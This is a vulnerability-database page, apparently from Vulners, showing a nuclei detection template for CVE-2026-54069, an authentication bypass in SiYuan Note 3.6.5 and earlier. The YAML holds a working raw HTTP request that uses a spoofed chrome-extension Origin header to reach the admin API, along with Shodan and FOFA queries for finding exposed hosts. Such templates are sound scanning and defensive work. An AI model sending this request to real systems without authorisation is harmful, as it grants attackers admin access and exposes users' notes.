Lucene search
K

SiYuan Note <= 3.6.5 - Authentication Bypass

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

SiYuan Note up to 3.6.5 allows authentication bypass via spoofed Origin header.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-54069
24 Jun 202621:17
attackerkb
Circl
CVE-2026-54069
17 Jun 202604:18
circl
CVE
CVE-2026-54069
24 Jun 202621:17
cve
Cvelist
CVE-2026-54069 SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist
24 Jun 202621:17
cvelist
EUVD
EUVD-2026-39125
24 Jun 202621:17
euvd
NVD
CVE-2026-54069
24 Jun 202622:16
nvd
Positive Technologies
PT-2026-50413
17 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-54069 SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist
24 Jun 202621:17
vulnrichment
id: CVE-2026-54069

info:
  name: SiYuan Note <= 3.6.5 - Authentication Bypass
  author: 0x_Akoko
  severity: high
  description: |
    SiYuan Note 3.6.5 and prior is vulnerable to authentication bypass. The CheckAuth middleware unconditionally trusted all chrome-extension:// origins, granting RoleAdministrator access without token validation to any request with a spoofed Origin header. Fixed in v3.7.0.
  impact: |
    Attackers can access all admin API endpoints, enabling full data exfiltration, stored XSS injection, and configuration tampering.
  remediation: |
    Update to SiYuan Note v3.7.0 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-54069
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-54069
    epss-score: 0.00607
    epss-percentile: 0.44641
    cwe-id: CWE-346
  metadata:
    verified: false
    max-request: 1
    vendor: siyuan-note
    product: siyuan
    shodan-query: title:"SiYuan"
    fofa-query: title="SiYuan" || body="siyuan"
  tags: cve,cve2026,siyuan,auth-bypass,unauth

http:
  - raw:
      - |
        POST /api/system/getConf HTTP/1.1
        Host: {{Hostname}}
        Origin: chrome-extension://auth-test
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"code\":0")'
          - 'contains_all(body, "\"conf\"", "\"system\"", "\"kernelVersion\"")'
        condition: and
# digest: 4a0a0047304502201ac92fa95ce0feaf25c24ab13bb431f54d78aa395e793e38998e1d0d1b94f245022100887d09d50ec075f07f12cf729123057033dca6c436adeedf2867696dee0ed452:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2026 04:18Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.2
EPSS0.00607
SSVC
20